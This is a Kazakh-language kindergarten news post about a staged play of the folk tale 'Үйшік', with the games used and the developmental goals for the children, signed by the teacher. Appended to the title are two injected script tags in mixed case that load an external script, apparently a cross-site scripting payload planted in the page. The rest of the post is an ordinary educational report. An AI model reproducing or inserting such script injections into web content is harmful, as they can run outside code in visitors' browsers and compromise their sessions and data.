«Үйшік» ертегісін сахналау- ойыны<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

19.08.2022

Мектеп жасына дейінгі балалар үшін ойын ерекше орын алады. Ойын арқылы тәлім- тәрбие алады.Ортаңғы «Айналайын» тобында «Үйшік» ертегісінің сахналау- ойыны өтті. Балаларға  ойын әрекеттерін көрсетуге және кейіпкерлердің іс – әрекеттеріне еліктеу, кейіпкерлердің қарапайым эмоционалды күйлерін жеткізуге, балаларды театр ойынына белсенді қатысуға шақыру, басқа балалармен-ертегі кейіпкерлерімен әрекеттерді үйлестіру қабілетін дамыту. Театрландырылған ойын процесі эмоционалды дамуға ықпал етті: балалар ертегі кейіпкерлерінің сезімдерімен, көңіл-күйлерімен танысты; оларды сыртқа көрсету  тәсілдерін игерді, белгілі бір көңіл-күйдің себептерін түсінді. Театрландырылған ойын балалардың сөйлеу дамуына  зор көмек көрсетіп, ойын процессінде  эмоционалды дамуға ықпал етті,балалар ертегі кейіпкерлерінің сезімдерімен, көңіл-күйлерімен танысты; оларды сыртқы білдіру тәсілдерін игерді, белгілі бір көңіл-күйдің себептерін түсінді сондай ақ  диалогта сөйлеуді жетілдіру және баланың өзін-өзі көрсету  қабілеттеріне ие болды.Ойын процессі танымдық, зерттеу және театрландырылған іс–шараларда жүргізілді.

 -«Үйшік» ертегісіне саяхат» ойын қабылдауы;

 - «Сиқырлы қап», «Жұмбақты тап» дидактикалық ойындары;

 - «Ертегі кейіпкерінің бейнесін көрсет» ойын-имитациясы; дене шынықтыру минуты,

 - орман жануарлары туралы жұмбақтар;

- (ашық, нақтылау, бағалау, тексеру) сұрақтары .

«Үйшік»  ертегісінің театрландырылған ойыны баланың ертегіні түсінуіне және ұжымдық сипатқа қатысу процесінде әлеуметтендірудің тиімді құралына айналды. Әдістер қолданылды

Тәрбиеші: Яльницкая Г.В.

 

Просмотров: 636


Пікір қосу



Деректерді қолтаңбаға қосу
Текст